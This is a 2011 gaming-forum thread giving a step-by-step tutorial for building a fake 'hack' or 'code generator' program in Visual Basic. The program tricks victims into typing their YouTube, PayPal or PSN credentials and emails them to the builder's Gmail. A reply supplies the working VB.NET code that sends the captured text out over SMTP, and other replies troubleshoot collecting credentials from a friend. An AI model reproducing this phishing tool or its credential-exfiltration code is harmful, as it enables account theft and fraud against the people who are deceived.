Post: How to steal YouTube, PayPal, ect. Accounts
07-19-2011, 04:49 PM #1
.Trent
Banned
(adsbygoogle = window.adsbygoogle || []).push({});
FULL CREDIT TO Warlockplayer19


Hello there NGU. I Am gonna show you how to steal YouTube Accounts and such not.

First you will need Visual Basic 2010.

Now, You will need to Create a New Project

After that, Replace text with anything you want. Ex. YouTube Sub Hack, PSN Code Generator. Or what not.

Now, After that Please Insert the Following:


  • 2 Text Boxes
  • 1 Timer
  • 1 Button
  • And 2 Labels
  • Also, Two Check Boxes


After that, Just customize your project.

Moving on now...

Put the two text boxes together like You must login or register to view this content.

Now, With your 2 Labels, Do something like You must login or register to view this content.

Note: If you are hacking PayPal's then you will need to change the Label "Username" to "Email"

Moving On.....

With you're Button, Name it like "Hack", or "Crack" Like You must login or register to view this content.

Now, With you're two check boxes you have, If you are hacking YouTube's with this, Do something like You must login or register to view this content.

Note: If you are hacking PayPal's, Name it like Add 100$ or Add $50.

Moving On Again....

Once you are done with all that, You will need to download You must login or register to view this content.

Download that onto you're Desktop.

Now, In you're Project double click the form. It will Look something Like You must login or register to view this content.

You will want to highlight EVERYTHING and Delete it like You must login or register to view this content.

You will have an outcome that will look like You must login or register to view this content.

Now, With the Text file you downloaded, You will need to open it, and Copy EVERYTHING That's in it.

Now, Go Back into your Project and Paste everything from the Download. You will have an outcome like You must login or register to view this content.

Now, You will need to edit some stuff in the project.

Scroll Down some until You must login or register to view this content.

Now, It will say "Email Here" like 3 times. Change that into you're email address.

Please Note: Must be a GMAIL Account. If not GMAIL, Will not work. It will ask for your password cause it's just like a Keylogger. Enter your password.

Now you can go You must login or register to view this content. To the Debug tab, And click Build.

You are now done.

Here is what I Made: You must login or register to view this content.

Proof that It Works: You must login or register to view this content.

Now, I Clicked Hacked, Went on My GMAIL and Had an email in 30 Secs of what I Entered.

Proof: You must login or register to view this content.

Virus Scans

Source Code by Warlockplayer19: You must login or register to view this content.

Please Report any Dead Links.

If you need any help, Just Quote Below or Private Message Me

Best Regards,

Rapzo
(adsbygoogle = window.adsbygoogle || []).push({});

The following user thanked .Trent for this useful post:

GodDrinksPepsi

The following user groaned .Trent for this awful post:

JakeM
08-04-2011, 12:25 PM #20
Imports System.Net.Mail
Public Class Form1

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Dim MyMailMessage As New MailMessage()
Try
MyMailMessage.From = New MailAddress("Your gmail account")
MyMailMessage.To.Add("Your second email")
MyMailMessage.Subject = TextBox1.Text
MyMailMessage.Body = TextBox2.Text
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("Gmail account", "Gmail password")
SMTP.Send(MyMailMessage)
TextBox2.Text = ""
Catch ex As Exception
End Try
End Sub
End Class








THIS IS THE CODE YOU NEED TO DOWLOAD :PBJ::PBJ::PBJ::PBJ:

The following user thanked sikmik1991 for this useful post:

Best Mate
08-05-2011, 08:14 PM #21
Will make one of theese for paypal youtube xbox ps3 halo or watever
08-07-2011, 06:39 AM #22
Cory
User needs a dick
Originally posted by Kanye
Will make one of theese for paypal youtube xbox ps3 halo or watever

If i type stuff on this it send but if a friend does i don't get an email. Help?
08-07-2011, 11:37 AM #23
Originally posted by Poynt View Post
If i type stuff on this it send but if a friend does i don't get an email. Help?
make sure he has an active internet connection
08-07-2011, 02:32 PM #24
unggubrian
I defeated!
This is a nice post and it's not hard to do at all.
08-07-2011, 06:05 PM #25
Cory
User needs a dick
Originally posted by Kanye
make sure he has an active internet connection

I figured It out, he has to run as Admin.

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo